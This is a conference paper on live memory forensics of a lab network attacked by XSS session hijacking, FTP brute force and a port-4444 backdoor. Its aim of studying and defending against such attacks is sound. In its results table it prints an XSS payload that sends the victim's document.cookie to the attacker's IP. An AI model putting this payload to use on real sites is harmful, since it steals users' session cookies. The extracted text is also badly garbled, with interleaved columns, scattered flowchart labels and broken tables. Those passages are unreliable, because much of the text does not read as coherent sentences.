2017 Fifth International Conference on Information and Communication Technology (ICoICT)

Digital Forensics Random Access Memory Using

Live Technique Based On Network Attacked
Periyadi1, Giva Andriana Mutiara1, Roni Wijaya1
1
Applied Science School, Telkom University
Bandung, Indonesia
periyadi@tass.telkomuniversity.ac.id
giva.andriana@tass.telkomuniversity.ac.id
roni.wijaya.2728@gmail.com

Abstract—The development of information and RAM in computer system describes all the activities that have
communication technologies are increasing rapidly. The security been occurred on the system during the system was running.
of data processed and stored also must be prepared in higher
security. One of the techniques in data security is digital Forensics investigators memory is the process of analyzing
forensics. Digital forensics is an investigative technique to the volatile data in RAM to obtain digital evidence that can be
identify or collect the information on a digital storage as evidence responsible accounted for [2]. Handling of volatile data in
to expose crimes legally defensible. However, in this research we RAM must be careful because data can be lost if the system is
use a live forensics digital technique. Investigations using live turned off. Therefore, we need a memory forensics techniques
forensics technique requires special handling because the volatile to ensure data integrity volatile without losing data that could
data in Random Access Memory which can be lost if the system is potentially be evidence.
in off investigation. This investigation conducted on the system
by dump memory investigator to the system which has been Some of security researcher Sam Stover and Matt
attacked and then transferred the file on system investigator. We Dickerson do the digital forensics on non-volatile storage such
investigate the data inside the RAM and make analysis about the as hard drive that has been physically removed by The
accuracy using several cyber attacks like session hijacking, FTP Coroners Toolkit (TCT) [3]. Timothy Vidas do the research in
attack, and illegal access. The result shows that all the attacks the acquisition and analysis of Random Access Memory, and
can be investigated and produced the evidence which is discusses the benefits and drawbacks of traditional incident
authentic, reliable, and defensible. response methods compared to augmented model that includes
the capture and subsequent analysis of a suspect system’s
Keywords—digital forensics; dumpmemory; live forensics; memory, provides a foundation for analyzing capture memory
memory accuisition; Random Access Memory [4].
In this research, we investigate the data in Random Access
I. INTRODUCTION
Memory using live forensics and make an analysis about the
The utilization of information and communication becomes accuracy of the data as the result of forensic memory by using
very important and must be presents in the process of some variation of several case scenarios that were tested. The
developing an institution or company. This dependency attacked scenario that will be used is session hijacking, FTP
unwittingly will increase the crime of technology and attack, and illegal access using 64 bit operating system Kali
communication which will be a risk for institutions or Linux 2.0.
companies.
The presence of information and electronic transaction laws II. LITERATURE STUDY
turns out less a major contribution in the process of
enforcement of legal cases in Indonesia. This is because this A. Digital Forensic
law appears to be merely regulate the flow of electronics Digital Forensics is the use of analysis and investigate
information in general. Yet, there are a lot of things that are techniques to identify, collect, examine, and save the evidence
detailed in legal cases and enforcement issues in Indonesia that of information which is stored in a digital storage that can be
have not been regulated in the law. The things that are detailed used as evidence in exposes crimes legally defensible [5].
is used as reference in information technology security which is Digital forensics is commonly used in both criminal law and
leading to the digital forensics. private investigation.
Inside a computer system, there are main memory or Fig.1 shows a process of forensics digital. The first step is
known as Random Access Memory (RAM), which play a very collection the data. Digital media that can be used as evidence
important component in a system [1]. RAM is one of volatile such as a storage like flash disk, mobile phone, memory and
storage media or data. Volatile is the technique of storage hard disk are collected as the data to be examine in the next
media that data will be lost if there is no electricity [1]. Volatile step. The second process is examination, data which has been
data in RAM is very useful for forensics process, because the collect will be examined by cloning or imaging the data. This

ISBN: 978-1-5090-4911-0 (c) 2017 IEEE

can be done by doing a copy data bit stream image in a safe instructions on the processor or on other electronic components
place. Bit stream is a method of storing digital image by on a computer.
copying all the bits of the original data including hidden files,
temporary files, defragmented file and the file which has not In general, the operating system is divided into several
overwrite yet. sections: (1) boot mechanism, placing the kernel into memory,
(2) kernel, the core part of an operating system, (3) shell or
command interpreter, which reads input from the user, (4)
library as providers of basic sets of functions and instructions
in operating system [8].

D. Live Forensic
Forensics Memory is one of the existing forensics
techniques. In the digital’s world forensics, there are two
Fig. 1. Forensics Process forensics techniques. The traditional forensics and live
The third step is analysis. In this step all the data will be forensics. Traditional or known as offline forensics techniques
analyzed and make the recovery to store back the file and the is a first technique using in computer forensics and commonly
folder. The tools for analyze the data is using MD5. The last used by the researcher to do the forensics data. This technique
step is reporting. This step is presenting and describing the requires the investigator to shut down the attacked system. Its
investigation report and the evidence that had been analyzed in aimed to anticipation any malicious processes running on the
detail and can be justified as scientific. system which can be delete the important data for investigation
purposes [9].
B. Random Access Memory
Random Access Memory is the main memory of a
computer. RAM is volatile, it is means that in RAM data will
be lost when the power of computer is turned off. Besides that,
RAM is used to store data temporarily and randomly, and No
issued the requested data processor also data flow from RAM
as dynamic and in a very high speed [6]. Yes

Fig. 2. Random Access Memory

Fig.2 shown the hardware of Random Access memory as Fig. 3. The Flowchart of Live Forensic
the main memory of system computer. RAM in computer Meanwhile, live forensics is an enhanced of traditional
system will be analyzed to found the evidence of the intrusion forensics. This technique is performed in the volatile data on a
from the attacker. RAM analysis captured is a process of computer system [9]. This technique is much different from the
capturing live memory from running computer system. RAM traditional forensics technique, because this data must be
analysis consists of performing forensics analysis on the data investigated in lively.
gathered from the live computer. Live forensics analysis is divided into two ways, internal
After conducting a memory dump on any live machine to analysis and external analysis. Internal analysis commonly
capture RAM, the memory image can be used to determine called as incident response is a method of analysis that is
information about running program, the operating system, and performed directly in the attacked system. While the external
the overall state of a computer, as well as to locate deleted or analysis done the analysis first by acquisition the memory or
temporary information that might otherwise not be found on a called as dump memory or memory imaging, using software
normal image [7]. installed on an attacked system that aims to provide digital files
containing snapshots (portrait) static volatile memory on
There are a lot of tools that available to serve aid forensics attacked system [9].
analysis in the capturing of RAM data. There are FTK Imager,
Volatility (using Kali Linux tool), Win64dd/MWMT DumpIt. The result of this dump memory is a file image form that
can be moved to an investigator’s system for further analysis.
C. Operating System Fig.3. shown the step of live forensics.
Operating System (OS) is a program that controls the
execution of application programs and act as the user interface III. DESIGN REQUIREMENT SYSTEM
of computers and computer hardware. An Operating System This research conducts an investigation on the attacked
has a kernel. Kernel is a computer program that set the system. Before doing the design of the system, we made an
input/output requests from the software and translate them into analysis of the requirement system. This system requires three
virtual machines that will be used as an investigator (host), the
victim (windows OS), and the attacker (kali linux). The
specification of those virtual machines can be seen in the
following table.
TABLE I. SPECIFICATION VIRTUAL MACHINE
Virtual Act As Hardware and Software
Machine no. Specification
Virtual Machine As Using a 64 bit XUbuntu Operating
1 on Virtual Box investigator System 14.04.1 LTS with IP address
GUI Version (host) configuration 192.168.25.1. The
4.3.36 software specification in this VM is
Volatility, Bulk Extractor, and
wireshark
Virtual Machine As the Using a 32 bit Windows XP SP3
2 on Virtual Box victims Professional with IP address
GUI Version configuration 192.168.25.101. The
4.3.36 software specification added is
Browser, XAMPP, DVWA
Virtual Machine As the Using a 64 bit Kali Linux with IP
3 on Virtual Box Attacker Address Configuration
GUI Version 192.168.25.102.
4.3.36
Based on the specification above, the design testing
topology for this research shown in Fig 4.
Ubuntu 14.04.1 LTS 64 bit
(investigator)

Virtual Box GUI Version 4.3.36

Host-Only

Fig. 5. Implementation Flowchart

IV. INVESTIGATE AND RESULT ANALYSIS

Windows XP SP3
Professional 32 bit
Kali Linux 2.0 64 bit
(Attacker)
After determine the requirement system, topology testing
(Victim)
system and implementation the system, the next step is doing
Fig. 4. Topology of Testing system the investigation and analysis system. The implementation of
After designing the testing topology, we design a procedure the system adapted to the requirements of each virtual machine
to implement the system that appropriate with requirement was already planned in the previous chapter.
system. The procedure can be shown in Fig 5 below.
Fig.6 shows flow diagram about the logic testing diagram
that will be done as the step of investigator to get the evidence
of the intrusion. The logic test block diagram is adopted from
the forensics process.

Collection Examination Analysis Result

Victim’s Installation Digital File as a 1. Evidence

System Dump memory result from intrusion
Dump Memory detection
Process Dump
FTK Imager/dd 2. Evidence
Memory
intrusion hole
Information
3. proven
Result From File from the
Volatility digital evidence
Dump Memory analysis Result

Fig. 6. Logic Testing Diagram

A. Investigation
Testing scenario as the investigation in this system is using
several cyber attacked techniques. The first scenario is
hijacking session. This scenario is the process of taking control
the victim’s session. But, the attacker should get the ID of
authentication session which stored in the cookie. So that, the
attacker will try to get a cookie’s victims.
 The second scenario is FTP Attack. This scenario is the flowchart of investigation can be shown in Fig.8 below. The
process of taking control of the system by taking a security gap investigation of session hijacking and FTP attack have the
in the FTP. The attacker will perform a brute force on FTP. same step of investigation while the investigation of illegal
After successfully entered the system, attacker will perform access is different with the others.
activities using the victim’s system.
The last scenario is Illegal Access. In this scenario, the Start

attacker will do the access to the victim’s system through the

network. The attacker will try to find the hole in the security
network and go through the system using this gap. Once Dump Memory
Session Hijacking
Dump Memory
FTP Attack
Dump Memory
illegal access
attackers get into the system, the attacker will make some
changes and downloading the file. After that the attacker will
upload the payload on the system. Record all the
information from
Record all the
information from
Record all the
information from
dump memory dump memory dump memory
All the scenario will apply as an investigator. To determine
the accuracy of this method, the investigator should identify IP
address attacker, the security hole using to login the system, the Volatility analysis Volatility analysis Volatility analysis
Yes
changes that have been made by the attacker, what files were
downloaded by the attacker, find the payload, and the timing of run plugin run plugin run plugin
the attack. volatility, volatility, volatility,
image info, image info, image info,
pstree dll pstree dll pstree dll
Fig.7 shown the flow diagram about the all scenario as the
intrusion to the system.
Need analysis Need analysis
Start in network ? in network ?
Documented the
evidence
Yes Yes

Run Bulk Run Bulk

Scanning Target Scanning Target Scanning Target Extractor Extractor
No No

Choose Target Choose Target

& the running & the running Choose Target
Success? Success?
Scan Scan
No
No
No No
http & Service Backdoor
MySql ? FTP ? infiltrated ? Packets.pcapYesand Packets.pcap and
Yes record all the record all the
Yes Yes information information
No Run Backdoor
Access DVWA List of Password
using exploit and
wait until the
backdoor open by Open Packets.pcap Open Packets.pcap
Security DVWA = Brute Force FTP the target using wireshark, using wireshark,
low Server No analysis it analysis it

No
Any Respond
Insert XSS Script Any from Back
door?
Documented the Documented the
Password ?
evidence evidence
Yes
Terminal Open Yes
Login FTP Server
doing the activities
using victim’s Stop
Listener Port computer
Upload Backdoor
80
Fig. 8. Investigation Flowchart
No

Script XSS
B. Result Analysis
Running?
The result of the investigation conducted to several
Yes
intrusion scenarios that have been tested will be described
Info Target
System shortly only about the information file of dump memory, the
information file of packets, pcap, information file of timeline
change session ID MACtime, and the summary of result analysis on each
intrusion scenario.
Access Website • Session Hijacking
using Victim’s
Session ID
Information file of session hijacking can be seen at table II,
while the summary record result analysis of session hijacking
Stop can be seen in table III below.
Fig. 7. Scenario Flowchart
All the system that had been intrusion by the attacker will
be investigated with different step of investigation. The
 After doing analysis on timeline mac-time file, we discover
some suspicious line. Based on parser file on Fig.10 there was
a file, named “penting.exe” which is a suspicious file as an
attacker.

TABLE II. INFORMATION FILE OF SESSION HIJACKING

Parameter Dump Memory Packets.pcap Timeline TABLE IV. INFORMATION FILE OF FTP ATTACK
Mac-time Parameter Dump Memory Packets.pcap Timeline
File name 22juni2016-SH.mem Packets.pcap Timeline- Mac-time
mactime.txt File name 14juli2016- Packets.pcap Timeline-
File size 536805376 172689 5131951 FTP.mem mactime.txt
File /media/cyber/ /home/cyber/ /home/cyber/
File size 536805376 306421 3728513
Address 3C0A072C0A06E2 out-bulk/ timeliner/SH/
MD5sum /media/cyber/ /home/cyber/ /home/cyber/
AE/ 22juni2016- timeline-
3C0A072C0A06E out-bulk/ timeliner/FA/
capturememory/ SH/packets.pcap mactime.txt
2AE/ 14juli2016- timeline-
22juni2016-SH.mm
capture\memory/ FA/packets.pcap mactime.txt
MD5SUM 245538328fdd873cf Cb94e3cd728 940d40f2f1
14juli2016-
4d9e3392e5668c4 2b70761656a7 86c2577dc5
FTP.mm
61566e90 10d8300e9710
MD5sum 84dee785935268c D92108805ce72 B6799857922f
Image local 2016-06-22 - -
161d612be2affbfc 625a78bb928cb a2a558b6d0a9
date and 17:26:59
4 e267a7 cefcf6b9
time +0700
Last 2016-06-22 2016-07-15 2016-07-16
Image 2016-07-14 - -
Modify 17:27:47.238921000 23:11:28.40038 17:35:23.2499
Local date 23:15:35
+0700 0827 04995
and time +0700
+0700 +0700
Last 2016-07-14 2016-07-16 2016-07-17
Last 2016-06-22 2016-07-15 2016-07-16
Modify 23:16:17.4860240 22:23:35.07028 19:18:07.8618
Change 19:43:20.558112600 23:11:28.40038 17:55:12.9579
0000 +0700 7482 33909
+0700 0827 31311
+0700 +0700
+0700 +0700
Last 2016-07-14 2016-07-16 2016-07-17
After doing analysis on timeline mac-time file, we discover Change 23:18:22.6052751 22:23:35.07028 19:18:07.8618
some suspicious line. Based on parser file on Fig.9 there was a 00 +0700 7482 33909
file, named “etc.php” which is a suspicious file as an attacker. +0700 +0700

Fig. 9. Suspicious File on Parser

TABLE III. RESULT ANALYSIS OF SESSION HIJACKING
Parameter Describe of information
Victim’s Operating Windows XP SP2x86 and Windows XP SP3x86 Fig. 10. Suspicious File on Parser FTP Attack
System
Victim’s 1eerlridi5n06nobd8nkhpatg6 The simplest handling to avoid brute force is using
PHPSESSID
Attacker’s IP 192.168.25.102
passwords by combining capital letters, number, and special
Address character. Besides that, don’t forget to use the password with
Attacker’s Operating Linux x86_64 more than 8 characters, use the limited login attempt, and
System install the firewall on your network. The result in table V will
Attacker’s Browser Firefox/38.0, iceweasel/38.8.0 be announced as an evidence.
XSS Script <script>document.location=http://192.168.25.102/? TABLE V. RESULT ANALYSIS OF FTP ATTACK
+document.cookie;</script> Parameter Describe of information
Security gaps DVWA Security=low Victim’s Operating Windows XP SP2x86 and Windows XP SP3x86
Port 80 System
Protocol TCP Attacker’s IP 192.168.25.102
File upload Etc.php Address
Method of attacker Session hijacking Security Gaps FTP Server
Time of intrusion unknown
Port 21
The simplest treatment to prevent the system from session Protocol FTP
hijacking is to perform the filtering of user input, so that the User name Root
user can not insert HTML tags into the comment field or File Upload Penting.exe
others. The result in table III will be announced as an evidence. Method of Attacker Brute Force
Time of intrusion unknown
• FTP attack • Illegal Access
Information file of FTP attack can be seen at table IV, Information file of Illegal Access can be seen at table VI,
while the summary record result analysis of FTP Attack can be while the summary record result analysis of Illegal Access can
seen in table V below. be seen in table VII below.
 has been successfully done by giving an evidence as the result
of investigator to the system which is attacked by three
attacked methods in the cyber network. This evidence can be
responsible and proven. Besides that, in order to avoid those all
intrusion, we should to perform the filtering user input, use the
passwords by combining capital letters, number, special
character, and should be more than 8 characters. Otherwise, use
TABLE VI. INFORMATION FILE OF ILLEGAL ACCESS the limited login attempt, install the firewall on your network,
Parameter Dump Memory Plugin dlllist Timeline perform regularly update antivirus, and use software that can
Mac-time detect the anomaly in the network like snort.
File name 14juli2016- dllist-IA.txt Timeline-
IA.mem mactime.txt
ACKNOWLEDGMENT (Heading 5)
File size 536805376 4876 4961351
MD5sum /media/cyber/ /home/cyber/Volat /home/cyber/ This Publication is financed by Directorate Research and
3C0A072C0A0 ility\File/ timeliner/FA/ Community Services of Telkom University.
6E2AE/ 14juli2016-dlllist- timeline-
capture\memory IA.txt mactime.txt
/ REFERENCES
14juli2016-
IA.mem
MD5sum 931933c6aaf338 13783bbfe8a418c Ea9834fcdc80 [1] M. H. Ligh, A. Case, J. Levy and A. Walters, The Art of Memory
087742871432 d81d2719e96ad35 ceabd6f136f75 Forensics : Detecting Malware and Threats in Windows, Linux,and Mac
Memory, Indianapolis,: John Wiley & Sons, Inc., 2014.
02 8fadab4
[2] F. Adelstein, "Live forensics: diagnosing your system without killing it
Image Local 2016-07-14 - - first," Communications of the ACM, vol. Volume 49 , no. Issue 2,
date and 23:51:23 February 2006
time +0700 [3] Stover S., Dickerson M. Using Memory Dumps in Digital Forensics.
Last Modify 2016-07-14 2016-07-18 2016-07-18 ;Login:magazine. Volume 30, Issue 5 December 2005. In press.
23:51:57.21286 00:59:56.7062875 01:25:37.6503 [4] Vidas, Timothy. Starting a Framework for analysis of Volatile Data
1000 +0700 54 21639 Stores. Third Annual ifip WG 11.9 International Conference on Digital
+0700 +0700 Forensics. Orlando, Florida. Jan 28-31, 2007.
Last Change 2016-07-14 2016-07-18 2016-07-18 [5] Asrizal, “Digital Forensik Apa dan Bagaimana,” 30 December
23:56:50.70223 00:59:56.7062875 01:25:37.6503 2010.[online]. Available: e-
88 00 +0700 54 21639 dokumen.kemenag.go.id/files/VQ2Hv7uT1339506324.pdf. in.press
+0700 +0700
[6] Tanembaum, Andrew S. “Structured Computer Organization “. 4th
The information file of illegal access a little bit different edition. Prentice Hall. 1999. Pp.200-201.
from FTP attack and Session hijacking. We use plugin dlllist to [7] Gross Christie., “ Digital Forensics RAM Analysis”
make an investigation in order to get timeline-mactime.txt. http://nest.unm.edu/files/7114/1392/6819/USCyberCrime-CG.pdf.
Next, investigator will look at the history of the use of the [online]
console. However, after repeated iteration there was not found [8] Stalling, William. “ Operating Systems”. 4th edition. Prentice Hall. 2015.
Pp. 30-35
any suspicious thing. The result in table VII will be announced
[9] M.Lessing and B.v.Solms, “Live Forensic Acquisition as Altrnative to
as an evidence. Tradisional Forensic Processes,” 2008.
TABLE VII. RESULT ANALYSIS OF ILLEGAL ACCESS
Parameter Describe of information
Victim’s Operating Windows XP SP2x86 and Windows XP SP3x86
System
Attacker’s IP 192.168.25.102
Address
Port 4444
Protocol TCP
Backdoor Penting.exe
The enhance of the Done by Penting.exe
priviledge
Dll file yang Dlllist-IA.text
diakses
Method of Exploit Backdoor
intrusion
Time of intrusion unknown
The simplest handling to avoid brute force is using firewall
software, perform regularly update antivirus, use software that
can detect the anomaly in the network like snort.

V. CONCLUSION
Based on the result of investigator and analysis system, we
can give a conclusion that live forensics using dump memory